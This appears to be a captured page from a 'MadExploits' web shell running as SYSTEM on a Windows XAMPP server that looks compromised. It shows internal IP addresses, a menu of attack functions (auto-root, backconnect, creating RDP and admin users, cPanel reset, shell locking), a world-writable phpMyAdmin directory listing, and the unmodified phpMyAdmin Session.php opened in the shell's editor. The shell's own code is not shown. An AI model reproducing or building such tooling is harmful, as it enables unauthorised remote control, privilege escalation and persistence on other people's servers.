Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
libraries /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
Charsets
[ DIR ]
drwxrwxrwx
Config
[ DIR ]
drwxrwxrwx
Controllers
[ DIR ]
drwxrwxrwx
Database
[ DIR ]
drwxrwxrwx
Dbi
[ DIR ]
drwxrwxrwx
Di
[ DIR ]
drwxrwxrwx
Display
[ DIR ]
drwxrwxrwx
Engines
[ DIR ]
drwxrwxrwx
Gis
[ DIR ]
drwxrwxrwx
Navigation
[ DIR ]
drwxrwxrwx
Plugins
[ DIR ]
drwxrwxrwx
Properties
[ DIR ]
drwxrwxrwx
Rte
[ DIR ]
drwxrwxrwx
Server
[ DIR ]
drwxrwxrwx
Setup
[ DIR ]
drwxrwxrwx
Twig
[ DIR ]
drwxrwxrwx
Utils
[ DIR ]
drwxrwxrwx
Advisor.php
19.56
KB
-rw-rw-rw-
Bookmark.php
10.74
KB
-rw-rw-rw-
BrowseForeigners.php
11.15
KB
-rw-rw-rw-
CentralColumns.php
44.19
KB
-rw-rw-rw-
Charsets.php
6.14
KB
-rw-rw-rw-
CheckUserPrivileges.php
12.59
KB
-rw-rw-rw-
Config.php
57.38
KB
-rw-rw-rw-
Console.php
3.69
KB
-rw-rw-rw-
Core.php
38.31
KB
-rw-rw-rw-
CreateAddField.php
17.91
KB
-rw-rw-rw-
DatabaseInterface.php
104.47
KB
-rw-rw-rw-
Encoding.php
8.68
KB
-rw-rw-rw-
Error.php
13.34
KB
-rw-rw-rw-
ErrorHandler.php
17.17
KB
-rw-rw-rw-
ErrorReport.php
8.92
KB
-rw-rw-rw-
Export.php
42.76
KB
-rw-rw-rw-
File.php
21.29
KB
-rw-rw-rw-
FileListing.php
2.83
KB
-rw-rw-rw-
Font.php
5.54
KB
-rw-rw-rw-
Footer.php
10.6
KB
-rw-rw-rw-
Header.php
21.87
KB
-rw-rw-rw-
Import.php
56.56
KB
-rw-rw-rw-
Index.php
24.5
KB
-rw-rw-rw-
IndexColumn.php
4.44
KB
-rw-rw-rw-
InsertEdit.php
129.31
KB
-rw-rw-rw-
InternalRelations.php
17.42
KB
-rw-rw-rw-
IpAllowDeny.php
9.57
KB
-rw-rw-rw-
Language.php
4.31
KB
-rw-rw-rw-
LanguageManager.php
23.71
KB
-rw-rw-rw-
Linter.php
5.21
KB
-rw-rw-rw-
ListAbstract.php
2.51
KB
-rw-rw-rw-
ListDatabase.php
4.34
KB
-rw-rw-rw-
Logging.php
2.6
KB
-rw-rw-rw-
Menu.php
22.36
KB
-rw-rw-rw-
Message.php
19.32
KB
-rw-rw-rw-
Mime.php
916
B
-rw-rw-rw-
MultSubmits.php
23.64
KB
-rw-rw-rw-
Normalization.php
40.41
KB
-rw-rw-rw-
OpenDocument.php
8.52
KB
-rw-rw-rw-
Operations.php
81.25
KB
-rw-rw-rw-
OutputBuffering.php
3.71
KB
-rw-rw-rw-
ParseAnalyze.php
2.55
KB
-rw-rw-rw-
Partition.php
7.27
KB
-rw-rw-rw-
Pdf.php
4.37
KB
-rw-rw-rw-
Plugins.php
22.95
KB
-rw-rw-rw-
RecentFavoriteTable.php
12.04
KB
-rw-rw-rw-
Relation.php
79.64
KB
-rw-rw-rw-
RelationCleanup.php
15
KB
-rw-rw-rw-
Replication.php
5.75
KB
-rw-rw-rw-
ReplicationGui.php
21.23
KB
-rw-rw-rw-
Response.php
16.14
KB
-rw-rw-rw-
Sanitize.php
14.51
KB
-rw-rw-rw-
SavedSearches.php
11.94
KB
-rw-rw-rw-
Scripts.php
3.65
KB
-rw-rw-rw-
Session.php
7.62
KB
-rw-rw-rw-
Sql.php
82.09
KB
-rw-rw-rw-
SqlQueryForm.php
17.63
KB
-rw-rw-rw-
StorageEngine.php
13.75
KB
-rw-rw-rw-
SubPartition.php
3.55
KB
-rw-rw-rw-
SysInfo.php
1.61
KB
-rw-rw-rw-
SysInfoBase.php
822
B
-rw-rw-rw-
SysInfoLinux.php
2.16
KB
-rw-rw-rw-
SysInfoSunOS.php
1.89
KB
-rw-rw-rw-
SysInfoWINNT.php
3.27
KB
-rw-rw-rw-
SystemDatabase.php
3.97
KB
-rw-rw-rw-
Table.php
94.87
KB
-rw-rw-rw-
TablePartitionDefinition.php
6.64
KB
-rw-rw-rw-
Template.php
4.02
KB
-rw-rw-rw-
Theme.php
8.62
KB
-rw-rw-rw-
ThemeManager.php
10.42
KB
-rw-rw-rw-
Tracker.php
30.13
KB
-rw-rw-rw-
Tracking.php
40.26
KB
-rw-rw-rw-
Transformations.php
16.27
KB
-rw-rw-rw-
TwoFactor.php
7.14
KB
-rw-rw-rw-
Types.php
24.93
KB
-rw-rw-rw-
Url.php
8.32
KB
-rw-rw-rw-
UserPassword.php
9
KB
-rw-rw-rw-
UserPreferences.php
8.62
KB
-rw-rw-rw-
UserPreferencesHeader.php
4.13
KB
-rw-rw-rw-
Util.php
168.02
KB
-rw-rw-rw-
VersionInformation.php
6.92
KB
-rw-rw-rw-
ZipExtension.php
10.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Session.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Session handling * * @package PhpMyAdmin * * @see https://www.php.net/manual/en/features.sessions.php */ declare(strict_types=1); namespace PhpMyAdmin; use PhpMyAdmin\Config; use PhpMyAdmin\Core; use PhpMyAdmin\ErrorHandler; use PhpMyAdmin\Util; /** * Session class * * @package PhpMyAdmin */ class Session { /** * Generates PMA_token session variable. * * @return void */ private static function generateToken() { $_SESSION[' PMA_token '] = Util::generateRandom(16, true); $_SESSION[' HMAC_secret '] = Util::generateRandom(16); /** * Check if token is properly generated (the generation can fail, for example * due to missing /dev/random for openssl). */ if (empty($_SESSION[' PMA_token '])) { Core::fatalError( 'Failed to generate random CSRF token!' ); } } /** * tries to secure session from hijacking and fixation * should be called before login and after successful login * (only required if sensitive information stored in session) * * @return void */ public static function secure() { // prevent session fixation and XSS if (session_status() === PHP_SESSION_ACTIVE && ! defined('TESTSUITE')) { session_regenerate_id(true); } // continue with empty session session_unset(); self::generateToken(); } /** * Session failed function * * @param array $errors PhpMyAdmin\ErrorHandler array * * @return void */ private static function sessionFailed(array $errors) { $messages = []; foreach ($errors as $error) { /* * Remove path from open() in error message to avoid path disclossure * * This can happen with PHP 5 when nonexisting session ID is provided, * since PHP 7, session existence is checked first. * * This error can also happen in case of session backed error (eg. * read only filesystem) on any PHP version. * * The message string is currently hardcoded in PHP, so hopefully it * will not change in future. */ $messages[] = preg_replace( '/open\(.*, O_RDWR\)/', 'open(SESSION_FILE, O_RDWR)', htmlspecialchars($error->getMessage()) ); } /* * Session initialization is done before selecting language, so we * can not use translations here. */ Core::fatalError( 'Error during session start; please check your PHP and/or ' . 'webserver log file and configure your PHP ' . 'installation properly. Also ensure that cookies are enabled ' . 'in your browser.' . '<br><br>' . implode('<br><br>', $messages) ); } /** * Set up session * * @param Config $config Configuration handler * @param ErrorHandler $errorHandler Error handler * @return void */ public static function setUp(Config $config, ErrorHandler $errorHandler) { // verify if PHP supports session, die if it does not if (! function_exists('session_name')) { Core::warnMissingExtension('session', true); } elseif (! empty(ini_get('session.auto_start')) && session_name() != 'phpMyAdmin' && ! empty(session_id())) { // Do not delete the existing non empty session, it might be used by // other applications; instead just close it. if (empty($_SESSION)) { // Ignore errors as this might have been destroyed in other // request meanwhile @session_destroy(); } elseif (function_exists('session_abort')) { // PHP 5.6 and newer session_abort(); } else { session_write_close(); } } // session cookie settings session_set_cookie_params( 0, $config->getRootPath(), '', $config->isHttps(), true ); // cookies are safer (use ini_set() in case this function is disabled) ini_set('session.use_cookies', 'true'); // optionally set session_save_path $path = $config->get('SessionSavePath'); if (! empty($path)) { session_save_path($path); // We can not do this unconditionally as this would break // any more complex setup (eg. cluster), see // https://github.com/phpmyadmin/phpmyadmin/issues/8346 ini_set('session.save_handler', 'files'); } // use cookies only ini_set('session.use_only_cookies', '1'); // strict session mode (do not accept random string as session ID) ini_set('session.use_strict_mode', '1'); // make the session cookie HttpOnly ini_set('session.cookie_httponly', '1'); // do not force transparent session ids ini_set('session.use_trans_sid', '0'); // delete session/cookies when browser is closed ini_set('session.cookie_lifetime', '0'); // some pages (e.g. stylesheet) may be cached on clients, but not in shared // proxy servers session_cache_limiter('private'); $httpCookieName = $config->getCookieName('phpMyAdmin'); @session_name($httpCookieName); // Restore correct sesion ID (it might have been reset by auto started session if ($config->issetCookie('phpMyAdmin')) { session_id($config->getCookie('phpMyAdmin')); } // on first start of session we check for errors // f.e. session dir cannot be accessed - session file not created $orig_error_count = $errorHandler->countErrors(false); $session_result = session_start(); if ($session_result !== true || $orig_error_count != $errorHandler->countErrors(false) ) { setcookie($httpCookieName, '', 1); $errors = $errorHandler->sliceErrors($orig_error_count); self::sessionFailed($errors); } unset($orig_error_count, $session_result); /** * Disable setting of session cookies for further session_start() calls. */ if (session_status() !== PHP_SESSION_ACTIVE) { ini_set('session.use_cookies', 'true'); } /** * Token which is used for authenticating access queries. * (we use "space PMA_token space" to prevent overwriting) */ if (empty($_SESSION[' PMA_token '])) { self::generateToken(); /** * Check for disk space on session storage by trying to write it. * * This seems to be most reliable approach to test if sessions are working, * otherwise the check would fail with custom session backends. */ $orig_error_count = $errorHandler->countErrors(); session_write_close(); if ($errorHandler->countErrors() > $orig_error_count) { $errors = $errorHandler->sliceErrors($orig_error_count); self::sessionFailed($errors); } session_start(); if (empty($_SESSION[' PMA_token '])) { Core::fatalError( 'Failed to store CSRF token in session! ' . 'Probably sessions are not working properly.' ); } } } }
Close
